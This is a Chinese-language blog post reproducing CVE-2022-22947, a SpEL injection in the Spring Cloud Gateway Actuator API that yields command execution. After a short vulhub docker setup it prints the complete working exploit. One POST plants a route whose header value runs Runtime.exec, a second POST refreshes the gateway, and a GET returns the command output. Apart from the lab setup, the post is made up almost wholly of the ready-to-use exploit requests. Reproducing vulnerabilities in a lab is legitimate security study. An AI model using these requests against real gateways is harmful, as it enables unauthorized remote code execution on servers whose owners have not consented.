Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)

2022-04-25 16:31:39 浏览数 (1)

Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)

一、环境搭建

代码语言:javascript复制
https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22947
docker-compose up -d

二、漏洞复现

添加一个含有恶意SpEL表达式的路由

代码语言:javascript复制
POST /actuator/gateway/routes/UzJu HTTP/1.1
Host:  ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 324

{
  "id": "UzJu",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"id"}).getInputStream()))}"}
  }],
"uri": "http://example.com",
"order": 0
}

如果遇到提示Unsupported Media Type

需要加上Content-Type为application/json即可

代码语言:javascript复制
Content-Type: application/json

刷新网关触发SpEL表达式

代码语言:javascript复制
POST /actuator/gateway/refresh HTTP/1.1
Host: ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 0

随后发送如下请求

代码语言:javascript复制
GET /actuator/gateway/routes/UzJu HTTP/1.1
Host: ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 0
json api spring gateway media

0 人点赞